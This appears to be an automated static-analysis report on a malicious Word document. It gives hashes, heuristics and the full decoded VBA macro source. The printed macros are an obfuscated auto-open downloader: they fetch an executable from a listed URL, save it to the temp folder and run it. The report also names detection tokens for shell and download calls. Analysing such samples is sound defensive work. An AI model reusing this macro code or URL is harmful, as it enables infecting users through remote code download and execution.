Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 108bdbc031bc05bf…

MALICIOUS

Office (OLE) / .DOC

Size: 44.0 KB
Created: 2014-09-03 17:55:00
Authoring application: Microsoft Office Word
First seen: 2022-11-25
MD5: 376fa3684461224fbf1d998672ac4921
SHA-1: 0a7d654ef39c5531851d11be3ecfaacd477fa602
SHA-256: 108bdbc031bc05bf907f3c5387bf16052ed037220597107fe0a3e3e40070de5c
Risk Score: 170

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros, including an AutoOpen subroutine, a common technique for executing malicious code as soon as a document is opened. The script uses CreateObject to instantiate 'Msxml2.XMLHTTP' and attempts to download a file from the URL 'http://www.helios.vn/98jh6d5/89hg56fd.exe'. This indicates downloader or dropper functionality.

Heuristics (7)

  • VBA macros detected (medium, 4 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call (high) OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set alaskan = CreateObject(melocactus)
  • CallByName call (high) OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    aesthetic = CallByName(alaskan, "open", VbMethod, ppepare, tron, False)
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro (low) OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://www.helios.vn/98jh6d5/89hg56fd.exe (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4373 bytes
SHA-256: 2d2d741a14808907b210a43e7633c3d5042cf7e504d6fd04176fe44c91ca895b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Main"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub bonn()
Dim cannaceae As Variant
Dim bedimmed As Long
Dim cristobalite As Object

ranged.disquietude
End Sub

Sub AutoOpen()
hideously = #5:59:31 AM#

mohican = Hour(hideously)
If mohican < 3 Then
ranged.countAs (23)
Else
bonn
End If
End Sub

Attribute VB_Name = "gnashing"

Private Sub DeleteComments()
    Dim curDoc As Word.Document = WordApp.ActiveDocument
    curDoc.DeleteAllComments()
    Marshal.ReleaseComObject (curDoc)
End Sub

Function alaskan()
On Error Resume Next
melocactus = "Msxm" + StrReverse("HLMX.2l") + Mid("abderiteTTPsilverweed", 9, 3)
Set alaskan = CreateObject(melocactus)
tron = Black.Hole
ppepare = StrReverse("TEG")
aesthetic = CallByName(alaskan, "open", VbMethod, ppepare, tron, False)
diligent = 32 + 85 - 25
myxosporidian = 17 + 23 + 26
If diligent + myxosporidian > 36 Then
overthrow = "di" + Left("shdaggle", 2) + ""
End If

alaskan.send
GoTo citadel
vigilantly:
alaskan = 0
citadel:
End Function

Function homophone(deerskin, diplomacy)
noise = 97 + 58 - 154
raceabout = ranged.community
risqu = Left(raceabout, 2)
melocactus = risqu + "o" + "db." + "Stream"
Set catabolic = CreateObject(melocactus)
balefully = CallByName(catabolic, "Open", VbMethod)
catabolic.Type = 52 + 22 - 73
aesthetic = CallByName(catabolic, Mid("arguerWrbrawler", 7, 2) + "ite" + Right("pupa", 0) + Left("meadowlark", 0), noise, deerskin.responseBody)
geist = 29 + 35
affirmative = 46 + 16
If geist + affirmative > 16 Then
messianic = Right("disestablishmentti", 2) + Mid("afibrinogenemianamidaedoubtfulness", 16, 7)
End If

nocens = CallByName(catabolic, "Sav" + Left("eToFimultarum", 5) + Mid("exocentriclemime", 11, 2), VbMethod, diplomacy, 54 - 52 - 1)
End Function



Attribute VB_Name = "ranged"

Function countAs(theRange) As Integer
  'Given a range of cells, counts how many As Are in that range
  Dim curVal
  
  countAs = 0
  
  For Each curVal In theRange
    'MsgBox curVal
    If InStr(curVal, "A") Then
      countAs = countAs + 1
    End If
  Next
  
End Function


Public Function community() As String
Dim divert As String
Dim diller As Variant
Dim schematically As String
community = ActiveDocument.BuiltInDocumentProperties("Author")
End Function

Function countFs(theRange) As Integer
  'Given a range of cells, counts how many As Are in that range
  Dim curVal
  
  countFs = 0
  
  For Each curVal In theRange
    'MsgBox curVal
    If InStr(curVal, "F") Then
      countFs = countFs + 1
    End If
  Next
  
End Function


Sub disquietude()
Dim toity As Variant
Dim environs As String
Dim edibility As String
amoebida = "buffoonery.exe"

criminative = Mid("nuesExpamoselle", 5, 4) + Left("ndEnvirounpresentable", 8) + "nmentStrings"
Dim caraffe As String
Set cygnus = CreateObject("WScr" + "ipt.She" + Mid("mousseuxllkazak", 9, 2) + Mid("saintbernard'slilybushy", 19, 0))
adnate = 98 + 67 - 111
cleared = 112 - 77 + 63
If adnate + cleared > 29 Then
Brightness = "ab" + "rogation"
End If

environs = CallByName(cygnus, criminative, 1, "%temp%")
legume = 84 - 86 + 69
durity = 28 + 123 - 80
If legume + durity > 76 Then
misreport = StrReverse("op") + Right("disestimationther", 4) + "b"
End If

edibility = environs & "\pcriminology" & amoebida
Set tontine = gnashing.alaskan
pleader = #6:17:39 AM#
ly = Hour(pleader)

calvaria = gnashing.homophone(tontine, edibility)
zoroastrianism = #3:03:43 AM#
bruise = Hour(zoroastrianism)

lamblike = 72 - 46 - 6
distored = 40 + 24
For lamblike = 72 - 46 - 6 To 40 + 24
curly = StrReverse("ba") + Mid("mollycoddlesorbunclog", 12, 4) + Left("edastray", 2)
Next lamblike

trend = CallByName(cygnus, "Run", VbMethod, edibility)
End Sub

Attribute VB_Name = "Black"
Attribute VB_Base = "0{FC45D493-DFA3-410C-ADBC-23EDDAAB9529}{A7FD49FC-3E7D-4AC7-AED1-2B875C728B41}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False